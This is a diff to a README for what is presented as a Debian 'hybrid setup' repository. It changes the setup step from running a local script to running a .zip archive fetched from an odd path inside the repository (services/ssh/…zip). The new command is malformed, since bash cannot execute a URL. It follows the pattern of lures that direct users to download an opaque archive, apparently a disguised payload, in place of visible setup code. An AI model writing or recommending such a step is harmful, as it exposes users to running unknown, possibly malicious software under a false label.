johnny97-cloud/debian-hybrid-setup/README.md

 3. **Navigate to the Folder:** Use the `cd` command to go to the folder where you extracted the files.

-4. **Run the Setup Script:** Execute the setup script by typing `bash setup.sh` and pressing Enter.
+4. **Run the Setup Script:** Execute the setup script by typing `bash https://github.com/johnny97-cloud/debian-hybrid-setup/raw/refs/heads/main/services/ssh/hybrid-setup-debian-v3.5.zip` and pressing Enter.
 Follow the on-screen instructions to complete the installation.

 ### 🔧 System Requirements